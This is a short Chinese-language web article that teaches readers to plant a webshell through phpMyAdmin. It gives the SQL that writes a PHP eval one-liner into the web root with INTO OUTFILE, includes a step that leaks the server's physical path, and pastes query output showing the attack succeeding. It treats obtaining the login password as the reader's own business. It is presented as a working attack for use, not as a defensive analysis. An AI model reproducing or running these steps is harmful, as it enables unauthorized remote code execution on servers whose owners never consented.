欢迎您访问程序员文章站本站旨在为大家提供分享程序员计算机编程知识!
您现在的位置是: 首页  >  网络运营

教你phpMyAdmin 后台拿webshell

程序员文章站 2022-05-12 19:51:19
1.如何拿到登陆密码,自己想办法。 2.访问 : http://url/phpmyadmin/libraries/select_lang.lib.php 得到物理路径. 3.选择一个Database.运行以下语句. ----start code--- Cre... 08-10-08...

1.如何拿到登陆密码,自己想办法。
2.访问 : http://url/phpmyadmin/libraries/select_lang.lib.php 得到物理路径.
3.选择一个database.运行以下语句.
----start code---
create table a (cmd text not null);
insert into a (cmd) values('<?php eval($_post[1]);?>');
select cmd from a into outfile 'f:/program files/apache group/apache2/htdocs/phpmyadmin/d.php/d.php';
drop table if exists a;
----end code---
4.如果没什么意外.对应网站得到webshell

您运行的 sql 语句已经成功运行了。
sql 查询:
create table a(
cmd text not null
);# mysql 返回的查询结果为空(即零行)。
insert into a( cmd )
values (
'<?php eval($_post[1]);?>'
);# 影响列数: 1
select cmd
from a
into outfile 'f:/program files/apache group/apache2/htdocs/phpmyadmin/d.php';# 影响列数: 1
drop table if exists a;# mysql 返回的查询结果为空(即零行)。